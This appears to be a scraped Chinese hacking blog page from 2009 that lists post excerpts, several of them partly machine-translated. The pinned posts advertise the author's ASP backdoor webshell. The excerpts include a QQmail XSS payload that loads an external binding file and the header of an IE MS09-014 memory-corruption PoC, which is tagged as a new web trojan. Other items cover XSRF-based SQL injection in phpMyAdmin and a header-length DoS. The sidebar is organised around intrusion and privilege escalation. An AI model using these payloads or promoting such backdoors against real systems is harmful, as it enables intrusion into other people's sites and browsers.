这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。
例图:
心动吧黑客BLOG
自发研究:须要多维思想而且要想不可能为可能的人才能做到
[置顶] 心动吧警告:除20080508外并未发布其他版本
先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。
[置顶] [原创]2009-1-18发布新版◆心动吧asp在线◆
心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门
此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式
2009年6月19日
QQmail Multiple Xss Vulnerabilities
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
1. firefox2 css xss vulnerabilities
<style>BODY{-moz-binding:url("http://www.80vul.coom/test.xml#xss")}</style>
test.xml:
<?xml version="1.0"?>
<bindings xmlns="http
Tags: 腾讯 firefox2 css QQmail Xss Vulnerabilities xss
2009年6月8日
hacked, including details
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
这里就不发全文了,全文放到txt里了,地址:astalavista_hacked.txt
The Hacking & Security Community
[+] Founded in 1997 by a hacker computer enthusiast
[-] Exposed in 2009 by anti-sec group
From < http://astalavista.com/faq>:
Tags: Astalavista HACKED
2009年5月14日
XCon2009 安全焦点信息安全技术峰会议题征集函
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
XCon 秉承一贯的严谨求实作风竭诚欢迎热爱信息安全技术的人员积极投稿,参加会议,共享精彩盛会。
参加会议对象:
任何热爱信息安全的人士,包括如信息安全专家,信息安全爱好者, 网络
管理工程师,网络安全顾问, CIO,黑客技术发烧友等
....
Tags: XCon2009 安全焦点 安全技术峰会
2009年5月9日
Windows Eventlog Fun with Free Tools
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
This week at work I was asked to find why a specific account was constantly being locked out. Sounds pretty easy eh. Well the thing is, this was a service account and I have quite a lot of DC's where this could be happening from.
I did a little research on my favorite site www.ultimatewindowssecurity.com and ran a few tests to make sure I new what I was looking for
....
Tags: Windows Eventlog Free Tools
2009年4月23日
server limit dos
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
墨西哥同学周末很郁闷的在宾馆上网,发现youtube被ban了,于是写个了tool解决这个问题。顺带想到了一种利用 google 统计的漏洞,写在这里了
http://sirdarckcat.blogspot.com/2009/04/how-to-use-google-analytics-to-dos.html
这个问题实际上是由于 webserver 的 request field limit 造成的。
当 http request header 过长时,webserver 会产生一个400 或者 4xx 错误
Your browser sent a request that this server could not understand.
Size of a request header field exceeds server limit.
Tags: cookie溢出 server limit dos google 漏洞
2009年4月21日
MS Internet Explorer EMBED Memory Corruption PoC (MS09-014)
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
明生注:将他保存为html然后打开试试,哈哈。好玩
<!--
MS09-014: MSIE EMBED element race condition memory corruption
Code by SkyLined <berendjanwever@gmail.com>
http://skypher.com/SkyLined/Repro/MSIE/EMBED%20memory%20corruption/repro3.html
http://skypher.com/index.php/2009/04/19/ms09-014-embed-element-memory-corruption
-->
.....
Tags: MS09-014 EMBED Memory Corruption PoC 新网马
2009年3月19日
基于XSRF的SQL注入技术
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
本文将向读者介绍一种基于跨站请求伪造的SQL注入技术。PhpMyAdmin是目前最流行的PHP项目,在现实中PhpMyAdmin已被大量采用。今年12月初,人们在PhpMyAdmin的3.1.0版本中发现了一个漏洞,不过这个漏洞的利用方法有些特别,那就是需要利用跨站请求伪造来进行SQL注入。本文将向读者介绍受影响的版本以及对这些版本软件的具体攻击方法,最后对出现漏洞的代码进行了详细的分析。
一、漏洞描述
phpMyAdmin 是一种 MySQL 数据库的管理工具,安装该工具后,即可以通过 web 形式直接管理 MySQL 数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者,所以目前非常流行。不过,今年十二月初,人们在3.1.0版本的phpMyAdmin上发现了一个安全漏洞,攻击者可以通过XSRF对phpMyAdmin进行SQL 注入攻击。并且无论magic_quotes_gpc被设为On或者Off,该漏洞仍然会被利用。
二、漏洞利用代码
...
Tags: XSRF sql
2009年3月3日
Active Man in the Middle Attacks
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
Trace: 我怎么感觉只是换了个叫法呢?
Adi Sharabani, manager of our own IBM Rational Security Group, gave a keynote presentation on the subject of Active Man in the Middle attacks at the recent OWASP AU conference that was held yesterday.
...Tags: MITM man in the middle
2009年2月24日
十大网络黑客技术的2008年(正式版)
发布:kissjetg | 分类:(M:)其他漏洞 | 评论:0 | 引用:0 | 浏览:
从TR博客中,然后用软件翻译的..拼凑就可以明白了
我们搜寻了深远和广泛收集许多网络黑客技术在2008年出版尽可能- 〜 70的所有。 These new and innovative techniques were analyzed and ranked based upon their novelty, impact, and pervasiveness.这些新的和创新的技术进行了分析和排名根据其新颖性,影响和渗透。 The 2008 competition was exceptionally fierce and our panel of judges ( Rich Mogull , Chris Hoff , HD Moore , and Jeff Forristal ) had their work cut out for them. 2008年竞争格外激烈,我们的法官小组( 富Mogull , 克里斯霍夫 , 高清摩尔 , 和 Jeff Forristal )的工作等着他们。 For any researcher, or "breaker" if you prefer, simply the act of creating something unique enough to appear on the list is no small feat.对于任何研究人员,或“断路器”如果你愿意,只要该行为创造一些独特的,足以显示在列表中是一项不小的壮举。 That much should be considered an achievement.这一点应被视为一项成就。 In the end, ten Web hacking techniques rose head and shoulders above.最后, 10网络黑客技术上升头部和肩部以上。
...
Tags: 2008黑客技术 十大黑客技术 Hacking
网站分类
(A:)本站原创 (19)- (D:)PHP程序漏洞 (43)
- (C:)ASP程序漏洞 (42)
- (E:)JSP程序漏洞 (1)
- (F:)CGI程序漏洞 (1)
- (G:)SQL数据库漏洞 (19)
- (H:)Oracle数据库漏洞 (8)
- (I:)第三方软件漏洞 (14)
- (J:)WINDOWS漏洞 (23)
- (K:)Linux漏洞 (12)
- (L:)入侵小技巧 (16)
- (N:)黑软武器集 (23)
- (M:)其他漏洞 (9)
- (O:)渗透技巧 (7)
- (P:)无线入侵 (5)
- (Q:)传统学习ASP (25)
- (I:)重新回温SQL (3)
- (S:)传统学习Javascript (11)
- (T:)杂七杂八 (4)
站内搜索
文章归档
DELPHI目录
Tags
- 学习asp (26)
- php漏洞 (18)
- 学习Javascript (11)
- php注入漏洞 (10)
- SQL Injection (9)
- linux提权 (8)
- Exploit (8)
- 注入 (7)
- sql注射漏洞 (7)
- SQL注入 (7)
- oracle漏洞 (6)
- 原创 (6)
- windows漏洞 (6)
- mysql (6)
- edit漏洞 (6)
- sql语句 (6)
- 0day (6)
- oracle注入 (5)
- linux渗透 (5)
- mysql注入工具 (5)
- ewebeditor修改后缀 (5)
- 提权 (5)
- 漏洞 (5)
- sql (5)
- MSSQL (5)
- IIS漏洞 (5)
- sql过滤空格 (4)
- 渗透 (4)
- PHPCMS2007注入 (4)
- 注入绕过 (4)
- phpcms2007漏洞 (4)
- maxcms注入 (4)
- BT3 无线 (4)
- 无线入侵 (4)
- 本地提权 (4)
- union select注入 (4)
- Linux (4)
- sql 数据库 (3)
- SQL替代空格 (3)
- 入侵技巧 (3)
- Session (3)
- php168 (3)
- sql提权 (3)
- 3389 (3)
- 绕过注入 (3)
- 提权技巧 (3)
- Jieqi cms漏洞 (3)
- 马克斯漏洞 (3)
- ewebeditor可以删除任意文件 (3)
- dedecms复盖漏洞 (3)